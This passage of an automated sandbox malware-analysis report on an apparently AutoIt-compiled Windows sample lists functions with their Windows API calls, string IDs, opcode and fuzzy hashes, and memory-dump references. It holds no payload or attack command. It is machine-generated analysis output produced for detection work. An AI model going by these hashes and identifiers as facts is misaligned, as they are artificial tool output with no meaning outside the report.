                                              • API ID: Window$DestroyMove
                                              • String ID: static
                                              • API String ID: 2139405536-2160076837
                                              • Opcode ID: f2e64ba00b36129044cf1ca5a73ab94bb472fae3507cedb97a4a9097848d42ea
                                              • Instruction ID: 2e64fcd1a601271d11cf661812f5877f2907cfb69b5c847e0c1d7999cdc75072
                                              • Opcode Fuzzy Hash: f2e64ba00b36129044cf1ca5a73ab94bb472fae3507cedb97a4a9097848d42ea
                                              • Instruction Fuzzy Hash: AE316A71150604ABEB109F68CC80EFB77E9FF88724F10965AF9A597190DAB1AC91CB60
                                              Function 00B93049 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • _memset.LIBCMT ref: 00B930B8
                                              • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00B930F3
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: InfoItemMenu_memset
                                              • String ID: 0
                                              • API String ID: 2223754486-4108050209
                                              • Opcode ID: 150049b4ee645b35391dba7da2de36aac6f58ca02efe7c30fb35c975d196ab04
                                              • Instruction ID: f66838445a24bfae3fe89da0a98c05a8ca6652fbcbc81259615f9972d1e508f6
                                              • Opcode Fuzzy Hash: 150049b4ee645b35391dba7da2de36aac6f58ca02efe7c30fb35c975d196ab04
                                              • Instruction Fuzzy Hash: 7331C3316003159BEF249F58C889BAEBBF8EB05B50F1440B9E985B61B1D7709B44CB50
                                              Function 00BA40B5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 84COMMON
                                              Download Yara Rule
                                              APIs
                                              • __snwprintf.LIBCMT ref: 00BA4132
                                                • Part of subcall function 00B41A36: _memmove.LIBCMT ref: 00B41A77
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: __snwprintf_memmove
                                              • String ID: , $$AUTOITCALLVARIABLE%d
                                              • API String ID: 3506404897-2584243854
                                              • Opcode ID: 0a2edcc2ab9a7d03c14624bb9fc301e725cfe8f02013487d93265fd4896c3074
                                              • Instruction ID: 0d6c0d07f77d6a16297a559881ec7d143c31a918e60e00b37e3524ae2bfb003c
                                              • Opcode Fuzzy Hash: 0a2edcc2ab9a7d03c14624bb9fc301e725cfe8f02013487d93265fd4896c3074
                                              • Instruction Fuzzy Hash: 37219330A0021DABCF10EF64CC81EAE7BF9EF55740F4444E4F905A7252DBB4AA85DBA1
                                              Function 00BB6CF9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00BB6D86
                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00BB6D91
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: MessageSend
                                              • String ID: Combobox
                                              • API String ID: 3850602802-2096851135
                                              • Opcode ID: 315054c66c894e98f3cc705b6a18397ba73e2b816d098ebc478d27f7f41894f4
                                              • Instruction ID: 1377b612791271f250fd8259c2b75fefb4cf5285c9a49f41be3731f51e7e1d9b
                                              • Opcode Fuzzy Hash: 315054c66c894e98f3cc705b6a18397ba73e2b816d098ebc478d27f7f41894f4
                                              • Instruction Fuzzy Hash: 5A118271710208BFEF159F54DC81FFB3BAAEB88364F114179FA149B2A0DAB59C518760
                                              Function 00BB722C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00B32111: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00B3214F
                                                • Part of subcall function 00B32111: GetStockObject.GDI32(00000011), ref: 00B32163
                                                • Part of subcall function 00B32111: SendMessageW.USER32(00000000,00000030,00000000), ref: 00B3216D
                                              • GetWindowRect.USER32(00000000,?), ref: 00BB7296
                                              • GetSysColor.USER32(00000012), ref: 00BB72B0
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: Window$ColorCreateMessageObjectRectSendStock
                                              • String ID: static
                                              • API String ID: 1983116058-2160076837
                                              • Opcode ID: 3fb268bc056e4c7e12fe705954a6453093584dfa6028b9fea4e9f76417078b49
                                              • Instruction ID: 15bb08045b4c3dc0b876296b1207390c070026e09b7c08b6fa08537d882ef136
                                              • Opcode Fuzzy Hash: 3fb268bc056e4c7e12fe705954a6453093584dfa6028b9fea4e9f76417078b49
                                              • Instruction Fuzzy Hash: 3B21477266420AAFDB04DFB8CC45EFA7BE8EB48304F004558FD55D3250DA74E850DB50
                                              Function 00BB6F45 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetWindowTextLengthW.USER32(00000000), ref: 00BB6FC7
                                              • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00BB6FD6
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: LengthMessageSendTextWindow
                                              • String ID: edit
                                              • API String ID: 2978978980-2167791130
                                              • Opcode ID: d44a9b7ef554caad90bea8986f5af453cd3703239462cacd5d8130e0bab5ef55
                                              • Instruction ID: 985b296a9333f9dee1630083b9c55b36e7a1523637ec75583c9a2e85799ce4ae
                                              • Opcode Fuzzy Hash: d44a9b7ef554caad90bea8986f5af453cd3703239462cacd5d8130e0bab5ef55
                                              • Instruction Fuzzy Hash: 9E118C71110208AFEB109E64EC80EFB3BAAEB14368F1047A4F964931E0CBB9DC50DB60
                                              Function 00B93156 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • _memset.LIBCMT ref: 00B931C9
                                              • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00B931E8
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: InfoItemMenu_memset
                                              • String ID: 0
                                              • API String ID: 2223754486-4108050209
                                              • Opcode ID: 7d6f722693a4667b2a5918c8c268410d2310d5ff722597b08363c41f6ee26aaf
                                              • Instruction ID: dd4c8abc0b671c0fe378bcb28647d801ca91d8ce3138b1c36c59f294634ac8f5
                                              • Opcode Fuzzy Hash: 7d6f722693a4667b2a5918c8c268410d2310d5ff722597b08363c41f6ee26aaf
                                              • Instruction Fuzzy Hash: 3B11BE31900224ABDF20DA98DC45BA977F8EB05B10F2501F1E806B72B0DB71AF05CA92
                                              Function 00BA28A2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62networkCOMMON
                                              Download Yara Rule
                                              APIs
                                              • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00BA28F8
                                              • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00BA2921
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: Internet$OpenOption
                                              • String ID: <local>
                                              • API String ID: 942729171-4266983199
                                              • Opcode ID: 90b94ce752ad089f7bf539c7d0fdfb80538ca2a53e99844f52ae9d330b1d3a9e
                                              • Instruction ID: 5c955321acaede1a9c5b22c9d8dba65379aba64e5fe19000f837af82edf2f4d7
                                              • Opcode Fuzzy Hash: 90b94ce752ad089f7bf539c7d0fdfb80538ca2a53e99844f52ae9d330b1d3a9e
                                              • Instruction Fuzzy Hash: D511E070509225BAEB298F558C88EBBFBECFF06750F1082AAF90556100E3746C94D6F0
                                              Function 00BA8475 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55networkCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00BA86E0: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,00BA849D,?,00000000,?,?), ref: 00BA86F7
                                              • inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00BA84A0
                                              • htons.WSOCK32(00000000,?,00000000), ref: 00BA84DD
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: ByteCharMultiWidehtonsinet_addr
                                              • String ID: 255.255.255.255
                                              • API String ID: 2496851823-2422070025
                                              • Opcode ID: ac91ae6b035688ec5dce54ba1850d1d0999ee07edede010415619a7ca214f96b
                                              • Instruction ID: bc606d75e43a8798db57761b0e90edc5a9af5a09fa3c26f54ff0da4b406eeb04
                                              • Opcode Fuzzy Hash: ac91ae6b035688ec5dce54ba1850d1d0999ee07edede010415619a7ca214f96b
                                              • Instruction Fuzzy Hash: 1511C275504206ABDB14AF64CC46FAEB3A4EF09310F108596E91157792DF31A910D795
                                              Function 00B899BD Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00B41A36: _memmove.LIBCMT ref: 00B41A77
                                                • Part of subcall function 00B8B79A: GetClassNameW.USER32(?,?,000000FF), ref: 00B8B7BD
                                              • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00B89A2B
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: ClassMessageNameSend_memmove
                                              • String ID: ComboBox$ListBox
                                              • API String ID: 372448540-1403004172
                                              • Opcode ID: da8e5e2fe0db95ab35982e9c34f2ec2255778879b0b856d8accb4c5b9788adc5
                                              • Instruction ID: 12be8e08ca72b01d0eaf1e657d897e3a993481367f5114d908c98652c5a61d67
                                              • Opcode Fuzzy Hash: da8e5e2fe0db95ab35982e9c34f2ec2255778879b0b856d8accb4c5b9788adc5
                                              • Instruction Fuzzy Hash: F3019275A41218AB8F14FBA8CC91CFE77E9EF56320B140A99F872572E1DA305948D760
                                              Function 00B9934C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: __fread_nolock_memmove
                                              • String ID: EA06
                                              • API String ID: 1988441806-3962188686
                                              • Opcode ID: be692c169a073065765540c9882864256d6731bf9d85093aa5405ca92e30a892
                                              • Instruction ID: a644946ae58681f9e617145d5e2f2386c195d51289a8e18762e8d4066b44c609
                                              • Opcode Fuzzy Hash: be692c169a073065765540c9882864256d6731bf9d85093aa5405ca92e30a892
                                              • Instruction Fuzzy Hash: 3801F9728042587EDF28CBA8C856FBE7BF8DB05301F0041DEF552D21C1E5B4A6088760
                                              Function 00B898B5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00B41A36: _memmove.LIBCMT ref: 00B41A77
                                                • Part of subcall function 00B8B79A: GetClassNameW.USER32(?,?,000000FF), ref: 00B8B7BD
                                              • SendMessageW.USER32(?,00000180,00000000,?), ref: 00B89923
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: ClassMessageNameSend_memmove
                                              • String ID: ComboBox$ListBox
                                              • API String ID: 372448540-1403004172
                                              • Opcode ID: c1ed4deffc7fec1209a64716c2554987587573f3ac4af417969373f6296df57c
                                              • Instruction ID: 0c2966211b7fae103ded5e2ed8ebdad1f4db60d252344ea3b545ce360e5a8bbf
                                              • Opcode Fuzzy Hash: c1ed4deffc7fec1209a64716c2554987587573f3ac4af417969373f6296df57c
                                              • Instruction Fuzzy Hash: E101D475E411086BCB14FBA4C952EFE73ECDF55340F140199B812632A1DA145F08E7B1
                                              Function 00B8993A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00B41A36: _memmove.LIBCMT ref: 00B41A77
                                                • Part of subcall function 00B8B79A: GetClassNameW.USER32(?,?,000000FF), ref: 00B8B7BD
                                              • SendMessageW.USER32(?,00000182,?,00000000), ref: 00B899A6
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: ClassMessageNameSend_memmove
                                              • String ID: ComboBox$ListBox
                                              • API String ID: 372448540-1403004172
                                              • Opcode ID: 08c25ac9e787f6497b5672db108a80bb7a3683fa595e413d29188173af2c912a
                                              • Instruction ID: bec8cd385de30cd0a0a3e4279d4a673028319e762d45f386f710f49735675827
                                              • Opcode Fuzzy Hash: 08c25ac9e787f6497b5672db108a80bb7a3683fa595e413d29188173af2c912a
                                              • Instruction Fuzzy Hash: F801A772E41118A6CF10FBA4C952EFE77ECDF11340F140199B845A32A1DA145F48D771
                                              Function 00B954E3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: ClassName_wcscmp
                                              • String ID: #32770
                                              • API String ID: 2292705959-463685578
                                              • Opcode ID: 059fcbb0a69073b75b159b95377b02419bd827f1d2058ff86ff5abb4652964e7
                                              • Instruction ID: aa63ea7ca39a86b10400749b82905827f9e102b871404f639b4851872bc60f31
                                              • Opcode Fuzzy Hash: 059fcbb0a69073b75b159b95377b02419bd827f1d2058ff86ff5abb4652964e7
                                              • Instruction Fuzzy Hash: AEE09B7250022957D720A699AC45FA7FBECDB59761F000097BD04D7151DA60994587D0
                                              Function 00B88892 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00B888A0
                                                • Part of subcall function 00B53588: _doexit.LIBCMT ref: 00B53592
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: Message_doexit
                                              • String ID: AutoIt$Error allocating memory.
                                              • API String ID: 1993061046-4017498283
                                              • Opcode ID: 95fa70951044662c279326d7864b129140ea670484d72c7db1be6238809b65a5
                                              • Instruction ID: c9ff820b61b262bf6c9b107306830df34dbe91b83ee454aff66fe5a76aef19c0
                                              • Opcode Fuzzy Hash: 95fa70951044662c279326d7864b129140ea670484d72c7db1be6238809b65a5
                                              • Instruction Fuzzy Hash: 5DD05B3138535832D25536E86C1BFCA7ACCCB05B51F1444FAFF08652D34ED5999092E5
                                              Function 00B6B4F1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00B6B544: _memset.LIBCMT ref: 00B6B551
                                                • Part of subcall function 00B50B74: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00B6B520,?,?,?,00B3100A), ref: 00B50B79
                                              • IsDebuggerPresent.KERNEL32(?,?,?,00B3100A), ref: 00B6B524
                                              • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00B3100A), ref: 00B6B533
                                              Strings
                                              • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00B6B52E
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                              • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                              • API String ID: 3158253471-631824599
                                              • Opcode ID: aff06f0cc05f8db8d08c255067862a64193d214d4d4998f86192f08890eb0572
                                              • Instruction ID: f7dd19cd96e0de662aa459740e7cfc7dfabb00269c66b9322d035b8733889bf7
                                              • Opcode Fuzzy Hash: aff06f0cc05f8db8d08c255067862a64193d214d4d4998f86192f08890eb0572
                                              • Instruction Fuzzy Hash: D6E06D712103518BD720AF25E815B42BBF0AF18705F1089EEE886C7342EFB9D544CB92
                                              Function 00B70251 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetSystemDirectoryW.KERNEL32(?), ref: 00B70091
                                                • Part of subcall function 00BAC6D9: LoadLibraryA.KERNEL32(kernel32.dll,?,00B7027A,?), ref: 00BAC6E7
                                                • Part of subcall function 00BAC6D9: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00BAC6F9
                                              • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 00B70289
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: Library$AddressDirectoryFreeLoadProcSystem
                                              • String ID: WIN_XPe
                                              • API String ID: 582185067-3257408948
                                              • Opcode ID: c373fdbef7cf3b763d8e49c4f77ca7eb93e36afa1c8e60118066544f5eaf80f9
                                              • Instruction ID: eab8b939ae29e4f87b099fd9a5ec7c498961c1def6f9b1515b7f3783a6efea91
                                              • Opcode Fuzzy Hash: c373fdbef7cf3b763d8e49c4f77ca7eb93e36afa1c8e60118066544f5eaf80f9
                                              • Instruction Fuzzy Hash: 5DF0C9B1825109DFCB25EBA4C998BECBBF8AB08310F2440D6E15AB7190DB714F84DF21
                                              Function 00B99EA0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetTempPathW.KERNEL32(00000104,?), ref: 00B99EB5
                                              • GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 00B99ECC
                                              Strings
                                              Memory Dump Source
